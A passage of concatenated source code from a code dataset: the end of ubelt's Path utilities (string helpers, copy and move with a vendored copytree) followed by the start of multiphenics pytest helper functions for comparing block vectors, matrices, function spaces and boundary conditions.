'basefoo'\n >>> assert base2 + 'foo' == str(base2.augment(tail='foo'))\n \"\"\"\n return os.fspath(self) + other\n\n def __radd__(self, other):\n \"\"\"\n Returns a new string ending with this fspath representation.\n\n Returns:\n str\n\n Allows ubelt.Path to be a better drop-in replacement when working with\n string-based paths.\n\n Note:\n It is not recommended to write new code that uses this behavior.\n This exists to make it easier to transition existing str-based\n paths to pathlib.\n\n Example:\n >>> import ubelt as ub\n >>> base = ub.Path('base')\n >>> base_ = ub.Path('base/')\n >>> base2 = ub.Path('base/2')\n >>> assert 'foo' + base == 'foobase'\n >>> assert 'foo' + base_ == 'foobase'\n >>> assert 'foo' + base2 == str(base2.augment(dpath='foobase'))\n \"\"\"\n return other + os.fspath(self)\n\n def endswith(self, suffix, *args):\n \"\"\"\n Test if the fspath representation ends with ``suffix``.\n\n Allows ubelt.Path to be a better drop-in replacement when working with\n string-based paths.\n\n Args:\n suffix (str | Tuple[str, ...]):\n One or more suffixes to test for\n\n *args:\n start (int): if specified begin testing at this position.\n end (int): if specified stop testing at this position.\n\n Returns:\n bool: True if any of the suffixes match.\n\n Example:\n >>> import ubelt as ub\n >>> base = ub.Path('base')\n >>> assert base.endswith('se')\n >>> assert not base.endswith('be')\n >>> # test start / stop cases\n >>> assert ub.Path('aabbccdd').endswith('cdd', 5)\n >>> assert not ub.Path('aabbccdd').endswith('cdd', 6)\n >>> assert ub.Path('aabbccdd').endswith('cdd', 5, 10)\n >>> assert not ub.Path('aabbccdd').endswith('cdd', 5, 7)\n >>> # test tuple case\n >>> assert ub.Path('aabbccdd').endswith(('foo', 'cdd'))\n >>> assert ub.Path('foo').endswith(('foo', 'cdd'))\n >>> assert not ub.Path('bar').endswith(('foo', 'cdd'))\n \"\"\"\n return os.fspath(self).endswith(suffix, *args)\n\n def startswith(self, prefix, *args):\n \"\"\"\n Test if the fspath representation starts with ``prefix``.\n\n Allows ubelt.Path to be a better drop-in replacement when working with\n string-based paths.\n\n Args:\n prefix (str | Tuple[str, ...]):\n One or more prefixes to test for\n\n *args:\n start (int): if specified begin testing at this position.\n end (int): if specified stop testing at this position.\n\n Returns:\n bool: True if any of the prefixes match.\n\n Example:\n >>> import ubelt as ub\n >>> base = ub.Path('base')\n >>> assert base.startswith('base')\n >>> assert not base.startswith('all your')\n >>> # test start / stop cases\n >>> assert ub.Path('aabbccdd').startswith('aab', 0)\n >>> assert ub.Path('aabbccdd').startswith('aab', 0, 5)\n >>> assert not ub.Path('aabbccdd').startswith('aab', 1, 5)\n >>> assert not ub.Path('aabbccdd').startswith('aab', 0, 2)\n >>> # test tuple case\n >>> assert ub.Path('aabbccdd').startswith(('foo', 'aab'))\n >>> assert ub.Path('foo').startswith(('foo', 'aab'))\n >>> assert not ub.Path('bar').startswith(('foo', 'aab'))\n \"\"\"\n return os.fspath(self).startswith(prefix, *args)\n\n # More shutil functionality\n # This is discussed in https://peps.python.org/pep-0428/#filesystem-modification\n\n def _request_copy_function(self, follow_file_symlinks=True,\n follow_dir_symlinks=True, meta='stats'):\n \"\"\"\n Get a copy_function based on specified capabilities\n \"\"\"\n import shutil\n from functools import partial\n if meta is None:\n copy_function = partial(shutil.copyfile, follow_symlinks=follow_file_symlinks)\n elif meta == 'stats':\n copy_function = partial(shutil.copy2, follow_symlinks=follow_file_symlinks)\n elif meta == 'mode':\n copy_function = partial(shutil.copy, follow_symlinks=follow_file_symlinks)\n else:\n raise KeyError(meta)\n return copy_function\n\n def copy(self, dst, follow_file_symlinks=False, follow_dir_symlinks=False,\n meta='stats', overwrite=False):\n \"\"\"\n Copy this file or directory to dst.\n\n By default files are never overwritten and symlinks are copied as-is.\n\n At a basic level (i.e. ignoring symlinks) for each path argument\n (``src`` and ``dst``) these can either be files, directories, or not\n exist. Given these three states, the following table summarizes how\n this function copies this path to its destination.\n\n TextArt:\n\n +----------+------------------------+------------------------+----------+\n | dst | dir | file | no-exist |\n +----------+ | | |\n | src | | | |\n +==========+========================+========================+==========+\n | dir | error-or-overwrite-dst | error | dst |\n +----------+------------------------+------------------------+----------+\n | file | dst / src.name | error-or-overwrite-dst | dst |\n +----------+------------------------+------------------------+----------+\n | no-exist | error | error | error |\n +----------+------------------------+------------------------+----------+\n\n In general, the contents of src will be the contents of dst, except for\n the one case where a file is copied into an existing directory. In this\n case the name is used to construct a fully qualified destination.\n\n Ignore:\n # Enumerate cases\n rows = [\n {'src': 'no-exist', 'dst': 'no-exist', 'result': 'error'},\n {'src': 'no-exist', 'dst': 'file', 'result': 'error'},\n {'src': 'no-exist', 'dst': 'dir', 'result': 'error'},\n\n {'src': 'file', 'dst': 'no-exist', 'result': 'dst'},\n {'src': 'file', 'dst': 'dir', 'result': 'dst / src.name'},\n {'src': 'file', 'dst': 'file', 'result': 'error-or-overwrite-dst'},\n\n {'src': 'dir', 'dst': 'no-exist', 'result': 'dst'},\n {'src': 'dir', 'dst': 'dir', 'result': 'error-or-overwrite-dst'},\n {'src': 'dir', 'dst': 'file', 'result': 'error'},\n ]\n import pandas as pd\n df = pd.DataFrame(rows)\n piv = df.pivot(['src'], ['dst'], 'result')\n print(piv.to_markdown(tablefmt=\"grid\", index=True))\n\n See: ~/code/ubelt/tests/test_path.py for test cases\n\n Args:\n dst (str | PathLike):\n if ``src`` is a file and ``dst`` does not exist, copies this to ``dst``\n if ``src`` is a file and ``dst`` is a directory, copies this to ``dst / src.name``\n\n if ``src`` is a directory and ``dst`` does not exist, copies this to ``dst``\n if ``src`` is a directory and ``dst`` is a directory, errors unless\n overwrite is True, in which case, copies this to ``dst`` and\n overwrites anything conflicting path.\n\n follow_file_symlinks (bool):\n If True and src is a link, the link will be resolved before\n it is copied (i.e. the data is duplicated), otherwise just\n the link itself will be copied.\n\n follow_dir_symlinks (bool):\n if True when src is a directory and contains symlinks to\n other directories, the contents of the linked data are\n copied, otherwise when False only the link itself is\n copied.\n\n meta (str | None):\n Indicates what metadata bits to copy. This can be 'stats' which\n tries to copy all metadata (i.e. like :py:func:`shutil.copy2`),\n 'mode' which copies just the permission bits (i.e. like\n :py:func:`shutil.copy`), or None, which ignores all metadata\n (i.e. like :py:func:`shutil.copyfile`).\n\n overwrite (bool):\n if False, and target file exists, this will raise an error,\n otherwise the file will be overwritten.\n\n Returns:\n Path: where the path was copied to\n\n Note:\n This is implemented with a combination of :func:`shutil.copy`,\n :func:`shutil.copy2`, and :func:`shutil.copytree`, but the defaults\n and behavior here are different (and ideally safer and more\n intuitive).\n\n Note:\n Unlike cp on Linux, copying a src directory into a dst directory\n will not implicitly add the src directory name to the dst\n directory. This means we cannot copy directory ``/``\n to ```` and expect the result to be ``/``.\n\n Conceptually you can expect ``//``\n to exist in ``/``.\n\n Example:\n >>> import ubelt as ub\n >>> root = ub.Path.appdir('ubelt', 'tests', 'path', 'copy').delete().ensuredir()\n >>> paths = {}\n >>> dpath = (root / 'orig').ensuredir()\n >>> clone0 = (root / 'dst_is_explicit').ensuredir()\n >>> clone1 = (root / 'dst_is_parent').ensuredir()\n >>> paths['fpath'] = (dpath / 'file0.txt').touch()\n >>> paths['empty_dpath'] = (dpath / 'empty_dpath').ensuredir()\n >>> paths['nested_dpath'] = (dpath / 'nested_dpath').ensuredir()\n >>> (dpath / 'nested_dpath/d0').ensuredir()\n >>> (dpath / 'nested_dpath/d0/f1.txt').touch()\n >>> (dpath / 'nested_dpath/d0/f2.txt').touch()\n >>> print('paths = {}'.format(ub.repr2(paths, nl=1)))\n >>> assert all(p.exists() for p in paths.values())\n >>> paths['fpath'].copy(clone0 / 'file0.txt')\n >>> paths['fpath'].copy(clone1)\n >>> paths['empty_dpath'].copy(clone0 / 'empty_dpath')\n >>> paths['empty_dpath'].copy((clone1 / 'empty_dpath_alt').ensuredir(), overwrite=True)\n >>> paths['nested_dpath'].copy(clone0 / 'nested_dpath')\n >>> paths['nested_dpath'].copy((clone1 / 'nested_dpath_alt').ensuredir(), overwrite=True)\n \"\"\"\n import shutil\n copy_function = self._request_copy_function(\n follow_file_symlinks=follow_file_symlinks,\n follow_dir_symlinks=follow_dir_symlinks, meta=meta)\n if self.is_dir():\n if sys.version_info[0:2] < (3, 8): # nocover\n copytree = _compat_copytree\n else:\n copytree = shutil.copytree\n dst = copytree(\n self, dst, copy_function=copy_function,\n symlinks=not follow_dir_symlinks, dirs_exist_ok=overwrite)\n elif self.is_file():\n if not overwrite:\n dst = Path(dst)\n if dst.is_dir():\n real_dst = dst / self.name\n else:\n real_dst = dst\n if real_dst.exists():\n raise FileExistsError('Cannot overwrite existing file unless overwrite=True')\n dst = copy_function(self, dst)\n else:\n raise FileExistsError('The source path does not exist')\n return Path(dst)\n\n def move(self, dst, follow_file_symlinks=False, follow_dir_symlinks=False,\n meta='stats'):\n \"\"\"\n Move a file from one location to another, or recursively move a\n directory from one location to another.\n\n This method will refuse to overwrite anything, and there is currently\n no overwrite option for technical reasons. This may change in the\n future.\n\n Args:\n dst (str | PathLike):\n A non-existing path where this file will be moved.\n\n follow_file_symlinks (bool):\n If True and src is a link, the link will be resolved before\n it is copied (i.e. the data is duplicated), otherwise just\n the link itself will be copied.\n\n follow_dir_symlinks (bool):\n if True when src is a directory and contains symlinks to\n other directories, the contents of the linked data are\n copied, otherwise when False only the link itself is\n copied.\n\n meta (str | None):\n Indicates what metadata bits to copy. This can be 'stats' which\n tries to copy all metadata (i.e. like shutil.copy2), 'mode'\n which copies just the permission bits (i.e. like shutil.copy),\n or None, which ignores all metadata (i.e. like\n shutil.copyfile).\n\n Note:\n This method will refuse to overwrite anything.\n\n This is implemented via :func:`shutil.move`, which depends heavily\n on :func:`os.rename` semantics. For this reason, this function\n will error if it would overwrite any data. If you want an\n overwriting variant of move we recommend you either either copy the\n data, and then delete the original (potentially inefficient), or\n use :func:`shutil.move` directly if you know how :func:`os.rename`\n works on your system.\n\n Returns:\n Path: where the path was moved to\n\n Example:\n >>> import ubelt as ub\n >>> dpath = ub.Path.appdir('ubelt', 'tests', 'path', 'move').delete().ensuredir()\n >>> paths = {}\n >>> paths['dpath0'] = (dpath / 'dpath0').ensuredir()\n >>> paths['dpath00'] = (dpath / 'dpath0' / 'sub0').ensuredir()\n >>> paths['fpath000'] = (dpath / 'dpath0' / 'sub0' / 'f0.txt').touch()\n >>> paths['fpath001'] = (dpath / 'dpath0' / 'sub0' / 'f1.txt').touch()\n >>> paths['dpath01'] = (dpath / 'dpath0' / 'sub1').ensuredir()\n >>> print('paths = {}'.format(ub.repr2(paths, nl=1)))\n >>> assert all(p.exists() for p in paths.values())\n >>> paths['dpath0'].move(dpath / 'dpath1')\n \"\"\"\n # Behave more like POSIX move to avoid potential confusing behavior\n if exists(dst):\n raise FileExistsError(\n 'Moves are only allowed to locations that dont exist')\n import shutil\n copy_function = self._request_copy_function(\n follow_file_symlinks=follow_file_symlinks,\n follow_dir_symlinks=follow_dir_symlinks, meta=meta)\n real_dst = shutil.move(self, dst, copy_function=copy_function)\n return Path(real_dst)\n\nif sys.version_info[0:2] < (3, 8): # nocover\n\n # Vendor in a nearly modern copytree for Python 3.6 and 3.7\n def _compat_copytree(src, dst, symlinks=False, ignore=None,\n copy_function=None, ignore_dangling_symlinks=False,\n dirs_exist_ok=False):\n \"\"\"\n A vendored shutil.copytree for older pythons based on the 3.10\n implementation\n \"\"\"\n from shutil import Error, copystat, copy2, copy\n with os.scandir(src) as itr:\n entries = list(itr)\n\n if ignore is not None:\n ignored_names = ignore(os.fspath(src), [x.name for x in entries])\n else:\n ignored_names = set()\n\n os.makedirs(dst, exist_ok=dirs_exist_ok)\n errors = []\n use_srcentry = copy_function is copy2 or copy_function is copy\n\n for srcentry in entries:\n if srcentry.name in ignored_names:\n continue\n srcname = os.path.join(src, srcentry.name)\n dstname = os.path.join(dst, srcentry.name)\n srcobj = srcentry if use_srcentry else srcname\n try:\n is_symlink = srcentry.is_symlink()\n if is_symlink and os.name == 'nt':\n # Special check for directory junctions, which appear as\n # symlinks but we want to recurse.\n # Not available on 3.6, use our impl instead\n # lstat = srcentry.stat(follow_symlinks=False)\n # if lstat.st_reparse_tag == stat.IO_REPARSE_TAG_MOUNT_POINT:\n # is_symlink = False\n from ubelt._win32_links import _win32_is_junction\n if _win32_is_junction(srcentry):\n is_symlink = False\n if is_symlink:\n linkto = os.readlink(srcname)\n if symlinks:\n # We can't just leave it to `copy_function` because legacy\n # code with a custom `copy_function` may rely on copytree\n # doing the right thing.\n os.symlink(linkto, dstname)\n copystat(srcobj, dstname, follow_symlinks=not symlinks)\n else:\n # ignore dangling symlink if the flag is on\n if not os.path.exists(linkto) and ignore_dangling_symlinks:\n continue\n # otherwise let the copy occur. copy2 will raise an error\n if srcentry.is_dir():\n _compat_copytree(srcobj, dstname, symlinks, ignore,\n copy_function,\n dirs_exist_ok=dirs_exist_ok)\n else:\n copy_function(srcobj, dstname)\n elif srcentry.is_dir():\n _compat_copytree(srcobj, dstname, symlinks, ignore,\n copy_function,\n dirs_exist_ok=dirs_exist_ok)\n else:\n # Will raise a SpecialFileError for unsupported file types\n copy_function(srcobj, dstname)\n # catch the Error from the recursive copytree so that we can\n # continue with other files\n except Error as err:\n errors.extend(err.args[0])\n except OSError as why:\n errors.append((srcname, dstname, str(why)))\n try:\n copystat(src, dst)\n except OSError as why:\n # Copying file access times may fail on Windows\n if getattr(why, 'winerror', None) is None:\n errors.append((src, dst, str(why)))\n if errors:\n raise Error(errors)\n return dst\n","repo_name":"Erotemic/ubelt","sub_path":"ubelt/util_path.py","file_name":"util_path.py","file_ext":"py","file_size_in_byte":60291,"program_lang":"python","lang":"en","doc_type":"code","stars":694,"dataset":"github-code","pt":"72"} +{"seq_id":"35286961826","text":"import numbers\nimport pytest\nfrom _pytest.mark import ParameterSet\nfrom numpy import allclose as float_array_equal, array_equal as integer_array_equal, bmat, hstack, hstack as bvec, sort, unique, vstack\nfrom dolfin import assemble, Constant, DOLFIN_EPS, dx, Expression, FiniteElement, Function, FunctionSpace, inner, MixedElement, project, SubDomain, TensorElement, TensorFunctionSpace, VectorElement, VectorFunctionSpace\nfrom dolfin.cpp.la import GenericMatrix, GenericVector\nfrom multiphenics import assign, block_assemble, block_assign, BlockDirichletBC, BlockFunction, block_split, BlockTestFunction, BlockTrialFunction, DirichletBC\n\n# ================ PYTEST HELPER ================ #\ndef pytest_mark_slow(item):\n return pytest.param(item, marks=pytest.mark.slow)\n\ndef pytest_mark_slow_for_cartesian_product(generator_1, generator_2):\n for i in generator_1():\n for j in generator_2():\n slow = False\n if isinstance(i, ParameterSet):\n assert len(i.marks) == 1\n assert i.marks[0].name == \"slow\"\n assert len(i.values) == 1\n i = i.values[0]\n slow = True\n if isinstance(j, ParameterSet):\n assert len(j.marks) == 1\n assert j.marks[0].name == \"slow\"\n assert len(j.values) == 1\n j = j.values[0]\n slow = True\n assert not isinstance(i, ParameterSet)\n assert not isinstance(j, ParameterSet)\n if slow:\n yield pytest_mark_slow((i, j))\n else:\n yield (i, j)\n\n# ================ EQUALITY BETWEEN ARRAYS ================ #\n# Floating point equality check\ndef array_equal(array1, array2):\n if isinstance(array1.dtype, numbers.Integral) and isinstance(array2.dtype, numbers.Integral):\n return len(array1) == len(array2) and integer_array_equal(array1, array2)\n else:\n return len(array1) == len(array2) and float_array_equal(array1, array2)\n\n# This function is required because ordering of dofs is different between dolfin and block libraries\ndef array_sorted_equal(array1, array2):\n return array_equal(sort(array1), sort(array2))\n\n# This function is required because ordering of dofs is different between dolfin and block libraries,\n# and because unique elements must be extracted when comparing tensors on subdomains.\ndef array_unique_equal(array1, array2):\n return array_equal(unique(array1), unique(array2))\n\n# ================ EQUALITY BETWEEN DOFS ================ #\ndef assert_owned_local_dofs(owned_local_dofs, block_owned_local_dofs):\n assert array_sorted_equal(owned_local_dofs, block_owned_local_dofs)\n\ndef assert_unowned_local_dofs(unowned_local_dofs, block_unowned_local_dofs):\n # Numbering of unowned dofs may be different, we can only check that the size\n # of the two vectors are consistent\n assert len(unowned_local_dofs) == len(block_unowned_local_dofs)\n\ndef assert_global_dofs(global_dofs, block_global_dofs):\n assert array_sorted_equal(global_dofs, block_global_dofs)\n\ndef assert_tabulated_dof_coordinates(dof_coordinates, block_dof_coordinates):\n assert array_equal(dof_coordinates, block_dof_coordinates)\n\n# ================ EQUALITY BETWEEN BLOCK VECTORS ================ #\ndef assert_block_vectors_equal(rhs, block_rhs, block_V):\n if isinstance(rhs, tuple):\n rhs1 = rhs[0]\n rhs2 = rhs[1]\n else:\n rhs1 = rhs\n rhs2 = None\n comm = block_rhs.mpi_comm()\n if rhs2 is not None:\n map_block_to_original = allgather((block_V.block_dofmap().block_to_original(0), block_V.block_dofmap().block_to_original(1)), comm, block_dofmap=block_V.block_dofmap(), dofmap=(block_V[0].dofmap(), block_V[1].dofmap()))\n rhs1g = allgather(rhs1, comm)\n rhs2g = allgather(rhs2, comm)\n rhsg = bvec([rhs1g, rhs2g])\n else:\n map_block_to_original = allgather(block_V.block_dofmap().block_to_original(0), comm, block_dofmap=block_V.block_dofmap(), dofmap=block_V[0].dofmap())\n rhs1g = allgather(rhs1, comm)\n rhsg = rhs1g\n block_rhsg = allgather(block_rhs, comm)\n assert block_rhsg.shape[0] == len(map_block_to_original)\n rhsg_for_assert = block_rhsg*0.\n for (block, original) in map_block_to_original.items():\n rhsg_for_assert[block] = rhsg[original]\n assert array_equal(rhsg_for_assert, block_rhsg)\n\n# ================ EQUALITY BETWEEN BLOCK MATRICES ================ #\ndef assert_block_matrices_equal(lhs, block_lhs, block_V):\n if isinstance(lhs, tuple):\n lhs11 = lhs[0][0]\n lhs12 = lhs[0][1]\n lhs21 = lhs[1][0]\n lhs22 = lhs[1][1]\n else:\n lhs11 = lhs\n lhs12 = None\n lhs21 = None\n lhs22 = None\n comm = block_lhs.mpi_comm()\n if lhs22 is not None:\n map_block_to_original = allgather((block_V.block_dofmap().block_to_original(0), block_V.block_dofmap().block_to_original(1)), comm, block_dofmap=block_V.block_dofmap(), dofmap=(block_V[0].dofmap(), block_V[1].dofmap()))\n lhs11g = allgather(lhs11, comm)\n lhs12g = allgather(lhs12, comm)\n lhs21g = allgather(lhs21, comm)\n lhs22g = allgather(lhs22, comm)\n lhsg = bmat([[lhs11g, lhs12g], [lhs21g, lhs22g]])\n else:\n map_block_to_original = allgather(block_V.block_dofmap().block_to_original(0), comm, block_dofmap=block_V.block_dofmap(), dofmap=block_V[0].dofmap())\n lhs11g = allgather(lhs11, comm)\n lhsg = lhs11g\n block_lhsg = allgather(block_lhs, comm)\n assert block_lhsg.shape[0] == len(map_block_to_original)\n assert block_lhsg.shape[1] == len(map_block_to_original)\n lhsg_for_assert = block_lhsg*0.\n for (block_i, original_i) in map_block_to_original.items():\n for (block_j, original_j) in map_block_to_original.items():\n lhsg_for_assert[block_i, block_j] = lhsg[original_i, original_j]\n assert array_equal(lhsg_for_assert, block_lhsg)\n\n# ================ EQUALITY BETWEEN BLOCK FUNCTIONS ================ #\ndef assert_block_functions_equal(functions, block_function, block_V):\n if functions is None and block_function is None:\n pass\n elif isinstance(functions, tuple):\n assert_block_vectors_equal((functions[0].vector(), functions[1].vector()), block_function.block_vector(), block_V)\n else:\n assert_block_vectors_equal(functions.vector(), block_function.block_vector(), block_V)\n\ndef assert_functions_manipulations(functions, block_V):\n n_blocks = len(functions)\n assert n_blocks in (1, 2)\n # a) Convert from a list of Functions to a BlockFunction\n block_function_a = BlockFunction(block_V)\n for (index, function) in enumerate(functions):\n assign(block_function_a.sub(index), function)\n # Block vector should have received the data stored in the list of Functions\n if n_blocks == 1:\n assert_block_functions_equal(functions[0], block_function_a, block_V)\n else:\n assert_block_functions_equal((functions[0], functions[1]), block_function_a, block_V)\n # b) Test block_assign\n block_function_b = BlockFunction(block_V)\n block_assign(block_function_b, block_function_a)\n # Each sub function should now contain the same data as the original block function\n for index in range(n_blocks):\n assert array_equal(block_function_b.sub(index).vector().get_local(), block_function_a.sub(index).vector().get_local())\n # The two block vectors should store the same data\n assert array_equal(block_function_b.block_vector().get_local(), block_function_a.block_vector().get_local())\n\n# ================ FUNCTION SPACES GENERATOR ================ #\ndef StokesFunctionSpace(mesh, family, degree):\n stokes_element = StokesElement(family, mesh.ufl_cell(), degree)\n return FunctionSpace(mesh, stokes_element)\n\ndef StokesElement(family, cell, degree):\n V_element = VectorElement(family, cell, degree + 1)\n Q_element = FiniteElement(family, cell, degree)\n return MixedElement(V_element, Q_element)\n\ndef FunctionAndRealSpace(mesh, family, degree):\n function_and_real_element = FunctionAndRealElement(family, mesh.ufl_cell(), degree)\n return FunctionSpace(mesh, function_and_real_element)\n\ndef FunctionAndRealElement(family, cell, degree):\n V_element = FiniteElement(family, cell, degree)\n R_element = FiniteElement(\"Real\", cell, 0)\n return MixedElement(V_element, R_element)\n\ndef get_function_spaces_1():\n return (\n lambda mesh: FunctionSpace(mesh, \"Lagrange\", 1),\n pytest_mark_slow(lambda mesh: FunctionSpace(mesh, \"Lagrange\", 2)),\n lambda mesh: VectorFunctionSpace(mesh, \"Lagrange\", 1),\n pytest_mark_slow(lambda mesh: VectorFunctionSpace(mesh, \"Lagrange\", 2)),\n pytest_mark_slow(lambda mesh: TensorFunctionSpace(mesh, \"Lagrange\", 1)),\n pytest_mark_slow(lambda mesh: TensorFunctionSpace(mesh, \"Lagrange\", 2)),\n lambda mesh: StokesFunctionSpace(mesh, \"Lagrange\", 1),\n pytest_mark_slow(lambda mesh: StokesFunctionSpace(mesh, \"Lagrange\", 2)),\n lambda mesh: FunctionSpace(mesh, \"Real\", 0),\n pytest_mark_slow(lambda mesh: VectorFunctionSpace(mesh, \"Real\", 0)),\n pytest_mark_slow(lambda mesh: FunctionAndRealSpace(mesh, \"Lagrange\", 1)),\n pytest_mark_slow(lambda mesh: FunctionAndRealSpace(mesh, \"Lagrange\", 2))\n )\n\ndef get_function_spaces_2():\n return pytest_mark_slow_for_cartesian_product(get_function_spaces_1, get_function_spaces_1)\n\ndef get_elements_1():\n return (\n lambda mesh: FiniteElement(\"Lagrange\", mesh.ufl_cell(), 1),\n pytest_mark_slow(lambda mesh: FiniteElement(\"Lagrange\", mesh.ufl_cell(), 2)),\n lambda mesh: VectorElement(\"Lagrange\", mesh.ufl_cell(), 1),\n pytest_mark_slow(lambda mesh: VectorElement(\"Lagrange\", mesh.ufl_cell(), 2)),\n pytest_mark_slow(lambda mesh: TensorElement(\"Lagrange\", mesh.ufl_cell(), 1)),\n pytest_mark_slow(lambda mesh: TensorElement(\"Lagrange\", mesh.ufl_cell(), 2)),\n lambda mesh: StokesElement(\"Lagrange\", mesh.ufl_cell(), 1),\n pytest_mark_slow(lambda mesh: StokesElement(\"Lagrange\", mesh.ufl_cell(), 2)),\n lambda mesh: FiniteElement(\"Real\", mesh.ufl_cell(), 0),\n pytest_mark_slow(lambda mesh: VectorElement(\"Real\", mesh.ufl_cell(), 0)),\n pytest_mark_slow(lambda mesh: FunctionAndRealElement(\"Lagrange\", mesh.ufl_cell(), 1)),\n pytest_mark_slow(lambda mesh: FunctionAndRealElement(\"Lagrange\", mesh.ufl_cell(), 2))\n )\n\ndef get_elements_2():\n return pytest_mark_slow_for_cartesian_product(get_elements_1, get_elements_1)\n\n# ================ SUBDOMAIN GENERATOR ================ #\ndef UnitSquareSubDomain(X, Y):\n class CustomSubDomain(SubDomain):\n def inside(self, x, on_boundary):\n return x[0] <= X and x[1] <= Y\n return CustomSubDomain()\n\ndef UnitSquareInterface(X=None, Y=None, on_boundary=False):\n assert (\n (X is not None and Y is None and on_boundary is False)\n or\n (X is None and Y is not None and on_boundary is False)\n or\n (X is None and Y is None and on_boundary is True)\n )\n if X is not None:\n class CustomSubDomain(SubDomain):\n def inside(self, x, on_boundary_):\n return x[0] >= X - DOLFIN_EPS and x[0] <= X + DOLFIN_EPS\n elif Y is not None:\n class CustomSubDomain(SubDomain):\n def inside(self, x, on_boundary_):\n return x[1] >= Y - DOLFIN_EPS and x[1] <= Y + DOLFIN_EPS\n elif on_boundary:\n class CustomSubDomain(SubDomain):\n def inside(self, x, on_boundary_):\n return on_boundary_\n return CustomSubDomain()\n\ndef OnBoundary():\n return UnitSquareInterface(on_boundary=True)\n\ndef get_restrictions_1():\n return (\n None,\n UnitSquareSubDomain(0.5, 0.5),\n UnitSquareInterface(on_boundary=True),\n pytest_mark_slow(UnitSquareInterface(X=1.0)),\n pytest_mark_slow(UnitSquareInterface(Y=0.0)),\n UnitSquareInterface(X=0.75),\n pytest_mark_slow(UnitSquareInterface(Y=0.25))\n )\n\ndef get_restrictions_2():\n return (\n (None, None),\n (None, UnitSquareSubDomain(0.75, 0.75)),\n pytest_mark_slow((None, UnitSquareInterface(on_boundary=True))),\n (None, UnitSquareInterface(Y=0.0)),\n pytest_mark_slow((UnitSquareSubDomain(0.5, 0.75), None)),\n pytest_mark_slow((UnitSquareInterface(on_boundary=True), None)),\n pytest_mark_slow((UnitSquareInterface(X=1.0), None)),\n (UnitSquareSubDomain(0.75, 0.75), UnitSquareSubDomain(0.75, 0.75)),\n pytest_mark_slow((UnitSquareSubDomain(0.5, 0.75), UnitSquareSubDomain(0.75, 0.75))),\n pytest_mark_slow((UnitSquareInterface(on_boundary=True), UnitSquareInterface(on_boundary=True))),\n (UnitSquareInterface(on_boundary=True), UnitSquareInterface(X=1.0)),\n pytest_mark_slow((UnitSquareInterface(X=1.0), UnitSquareInterface(on_boundary=True))),\n (UnitSquareInterface(X=1.0), UnitSquareInterface(Y=0.0)),\n pytest_mark_slow((UnitSquareInterface(X=0.75), UnitSquareInterface(Y=0.0))),\n pytest_mark_slow((UnitSquareInterface(X=0.75), UnitSquareInterface(Y=0.25))),\n (UnitSquareSubDomain(0.5, 0.75), UnitSquareInterface(on_boundary=True)),\n pytest_mark_slow((UnitSquareSubDomain(0.5, 0.75), UnitSquareInterface(Y=0.25))),\n pytest_mark_slow((UnitSquareInterface(on_boundary=True), UnitSquareSubDomain(0.5, 0.75))),\n pytest_mark_slow((UnitSquareInterface(Y=0.25), UnitSquareSubDomain(0.5, 0.75)))\n )\n\n# ================ BLOCK BOUNDARY CONDITIONS GENERATOR ================ #\n# Computation of block bcs for single block\ndef get_block_bcs_1():\n def _get_bc_1(block_V):\n on_boundary = OnBoundary()\n shape_1 = block_V[0].ufl_element().value_shape()\n if len(shape_1) == 0:\n bc1_fun = Constant(1.)\n elif len(shape_1) == 1 and shape_1[0] == 2:\n bc1_fun = Constant((1., 2.))\n elif len(shape_1) == 1 and shape_1[0] == 3:\n bc1_fun = Constant((1., 2., 3.))\n elif len(shape_1) == 2:\n bc1_fun = Constant(((1., 2.),\n (3., 4.)))\n return DirichletBC(block_V.sub(0), bc1_fun, on_boundary)\n return (\n lambda block_V: None,\n pytest_mark_slow(lambda block_V: BlockDirichletBC([None], block_function_space=block_V)),\n lambda block_V: BlockDirichletBC([_get_bc_1(block_V)])\n )\n\n# Computation of block bcs for two blocks\ndef get_block_bcs_2():\n def _get_bc_1(block_V):\n on_boundary = OnBoundary()\n shape_1 = block_V[0].ufl_element().value_shape()\n if len(shape_1) == 0:\n bc1_fun = Constant(1.)\n elif len(shape_1) == 1 and shape_1[0] == 2:\n bc1_fun = Constant((1., 2.))\n elif len(shape_1) == 1 and shape_1[0] == 3:\n bc1_fun = Constant((1., 2., 3.))\n elif len(shape_1) == 2:\n bc1_fun = Constant(((1., 2.),\n (3., 4.)))\n return DirichletBC(block_V.sub(0), bc1_fun, on_boundary)\n def _get_bc_2(block_V):\n on_boundary = OnBoundary()\n shape_2 = block_V[1].ufl_element().value_shape()\n if len(shape_2) == 0:\n bc2_fun = Constant(11.)\n elif len(shape_2) == 1 and shape_2[0] == 2:\n bc2_fun = Constant((11., 12.))\n elif len(shape_2) == 1 and shape_2[0] == 3:\n bc2_fun = Constant((11., 12., 13.))\n elif len(shape_2) == 2:\n bc2_fun = Constant(((11., 12.),\n (13., 14.)))\n return DirichletBC(block_V.sub(1), bc2_fun, on_boundary)\n return (\n lambda block_V: None,\n pytest_mark_slow(lambda block_V: BlockDirichletBC([None, None], block_function_space=block_V)),\n lambda block_V: BlockDirichletBC([_get_bc_1(block_V), None]),\n pytest_mark_slow(lambda block_V: BlockDirichletBC([None, _get_bc_2(block_V)])),\n lambda block_V: BlockDirichletBC([_get_bc_1(block_V), _get_bc_2(block_V)])\n )\n\n# ================ RIGHT-HAND SIDE BLOCK FORM GENERATOR ================ #\n# Computation of rhs block form for single block\ndef get_rhs_block_form_1(block_V):\n block_v = BlockTestFunction(block_V)\n (v, ) = block_split(block_v)\n shape_1 = block_V[0].ufl_element().value_shape()\n if len(shape_1) == 0:\n f = Expression(\"2*x[0] + 4*x[1]*x[1]\", degree=2)\n block_form = [f*v*dx]\n elif len(shape_1) == 1 and shape_1[0] == 2:\n f = Expression((\"2*x[0] + 4*x[1]*x[1]\", \"3*x[0] + 5*x[1]*x[1]\"), degree=2)\n block_form = [inner(f, v)*dx]\n elif len(shape_1) == 1 and shape_1[0] == 3:\n f = Expression((\"2*x[0] + 4*x[1]*x[1]\", \"3*x[0] + 5*x[1]*x[1]\", \"7*x[0] + 11*x[1]*x[1]\"), degree=2)\n block_form = [inner(f, v)*dx]\n elif len(shape_1) == 2:\n f = Expression(((\"2*x[0] + 4*x[1]*x[1]\", \"3*x[0] + 5*x[1]*x[1]\"),\n (\"7*x[0] + 11*x[1]*x[1]\", \"13*x[0] + 17*x[1]*x[1]\")), degree=2)\n block_form = [inner(f, v)*dx]\n return block_form\n\n# Computation of rhs block form for two blocks\ndef get_rhs_block_form_2(block_V):\n block_v = BlockTestFunction(block_V)\n (v1, v2) = block_split(block_v)\n block_form = [None, None]\n shape_1 = block_V[0].ufl_element().value_shape()\n if len(shape_1) == 0:\n f1 = Expression(\"2*x[0] + 